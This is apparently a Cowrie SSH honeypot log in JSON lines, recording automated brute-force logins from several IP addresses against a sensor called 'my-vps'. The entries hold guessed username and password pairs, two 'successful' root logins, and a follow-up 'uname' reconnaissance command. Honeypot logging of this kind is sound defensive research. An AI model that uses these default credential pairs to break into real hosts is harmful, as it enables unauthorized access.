{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:10.356595Z","src_ip":"45.125.211.194","session":"2b2ea6da19d7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:10.853646Z","src_ip":"212.227.235.229","session":"46e6895a3917"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:11.184347Z","src_ip":"45.125.211.194","session":"2b2ea6da19d7"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:12.396604Z","src_ip":"45.125.211.194","session":"2b2ea6da19d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35480,"dst_ip":"1.2.3.4","dst_port":22,"session":"7667ae595339","protocol":"ssh","message":"New connection: 212.227.235.229:35480 (1.2.3.4:22) [session: 7667ae595339]","sensor":"my-vps","timestamp":"2025-08-28T03:27:14.342603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:14.343422Z","src_ip":"212.227.235.229","session":"7667ae595339"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:14.590569Z","src_ip":"212.227.235.229","session":"7667ae595339"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask","message":"login attempt [flask/flask] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:15.334891Z","src_ip":"212.227.235.229","session":"7667ae595339"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:16.584823Z","src_ip":"212.227.235.229","session":"7667ae595339"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35038,"dst_ip":"1.2.3.4","dst_port":22,"session":"45ee000d1872","protocol":"ssh","message":"New connection: 212.227.125.160:35038 (1.2.3.4:22) [session: 45ee000d1872]","sensor":"my-vps","timestamp":"2025-08-28T03:27:17.368352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:17.369010Z","src_ip":"212.227.125.160","session":"45ee000d1872"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:17.593292Z","src_ip":"212.227.125.160","session":"45ee000d1872"}
{"eventid":"cowrie.login.failed","username":"gpuadmin","password":"gpuadmin","message":"login attempt [gpuadmin/gpuadmin] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:18.267689Z","src_ip":"212.227.125.160","session":"45ee000d1872"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:19.494491Z","src_ip":"212.227.125.160","session":"45ee000d1872"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":32627,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f033667c011","protocol":"ssh","message":"New connection: 45.125.211.194:32627 (1.2.3.4:22) [session: 2f033667c011]","sensor":"my-vps","timestamp":"2025-08-28T03:27:24.962119Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:24.989986Z","src_ip":"45.125.211.194","session":"2f033667c011"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:25.173510Z","src_ip":"45.125.211.194","session":"2f033667c011"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:26.011481Z","src_ip":"45.125.211.194","session":"2f033667c011"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:27.223832Z","src_ip":"45.125.211.194","session":"2f033667c011"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55916,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0ca6bb2793e","protocol":"ssh","message":"New connection: 212.227.125.160:55916 (1.2.3.4:22) [session: f0ca6bb2793e]","sensor":"my-vps","timestamp":"2025-08-28T03:27:28.965719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:28.967024Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:29.186301Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:27:29.859335Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:27:30.368222Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:27:30.368976Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:30.587505Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:30.588703Z","src_ip":"212.227.125.160","session":"f0ca6bb2793e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50952,"dst_ip":"1.2.3.4","dst_port":22,"session":"43a0f39a0aa2","protocol":"ssh","message":"New connection: 217.72.205.35:50952 (1.2.3.4:22) [session: 43a0f39a0aa2]","sensor":"my-vps","timestamp":"2025-08-28T03:27:31.726329Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:31.727528Z","src_ip":"217.72.205.35","session":"43a0f39a0aa2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38568,"dst_ip":"1.2.3.4","dst_port":22,"session":"e2543b5ccecf","protocol":"ssh","message":"New connection: 212.227.235.229:38568 (1.2.3.4:22) [session: e2543b5ccecf]","sensor":"my-vps","timestamp":"2025-08-28T03:27:31.786041Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:31.787190Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:32.042386Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.login.success","username":"root","password":"4e2q1w3r","message":"login attempt [root/4e2q1w3r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:27:32.808515Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:27:33.335684Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:27:33.336450Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:33.592456Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:33.593499Z","src_ip":"212.227.235.229","session":"e2543b5ccecf"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:33.713168Z","src_ip":"212.227.125.160","session":"1a45b36ee93a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38124,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ddedcdb3795","protocol":"ssh","message":"New connection: 212.227.125.160:38124 (1.2.3.4:22) [session: 4ddedcdb3795]","sensor":"my-vps","timestamp":"2025-08-28T03:27:34.695942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:34.696827Z","src_ip":"212.227.125.160","session":"4ddedcdb3795"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:34.912867Z","src_ip":"212.227.125.160","session":"4ddedcdb3795"}
{"eventid":"cowrie.login.failed","username":"flask","password":"flask123","message":"login attempt [flask/flask123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:35.564155Z","src_ip":"212.227.125.160","session":"4ddedcdb3795"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:36.784501Z","src_ip":"212.227.125.160","session":"4ddedcdb3795"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":33248,"dst_ip":"1.2.3.4","dst_port":22,"session":"626dd461738f","protocol":"ssh","message":"New connection: 194.233.79.134:33248 (1.2.3.4:22) [session: 626dd461738f]","sensor":"my-vps","timestamp":"2025-08-28T03:27:38.046597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:38.288838Z","src_ip":"194.233.79.134","session":"626dd461738f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:38.289536Z","src_ip":"194.233.79.134","session":"626dd461738f"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":62879,"dst_ip":"1.2.3.4","dst_port":22,"session":"919393a880ba","protocol":"ssh","message":"New connection: 45.125.211.194:62879 (1.2.3.4:22) [session: 919393a880ba]","sensor":"my-vps","timestamp":"2025-08-28T03:27:39.797594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:27:39.798415Z","src_ip":"45.125.211.194","session":"919393a880ba"}
{"eventid":"cowrie.session.closed","duration":120.00132179260254,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:39.980237Z","src_ip":"212.227.125.160","session":"de0c5bfabbbf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:27:40.074776Z","src_ip":"45.125.211.194","session":"919393a880ba"}
{"eventid":"cowrie.login.failed","username":"test","password":"test123","message":"login attempt [test/test123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:40.740268Z","src_ip":"45.125.211.194","session":"919393a880ba"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:41.962533Z","src_ip":"45.125.211.194","session":"919393a880ba"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-28T03:27:43.139547Z","src_ip":"194.233.79.134","session":"626dd461738f"}
{"eventid":"cowrie.session.closed","duration":"6.5","message":"Connection lost after 6.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:27:44.555782Z","src_ip":"194.233.79.134","session":"626dd461738f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59000,"dst_ip":"1.2.3.4","dst_port":22,"session":"f6b638c13ea8","protocol":"ssh","message":"New connection: 212.227.125.160:59000 (1.2.3.4:22) [session: f6b638c13ea8]","sensor":"my-vps","timestamp":"2025-08-28T03:27:46.664463Z"}
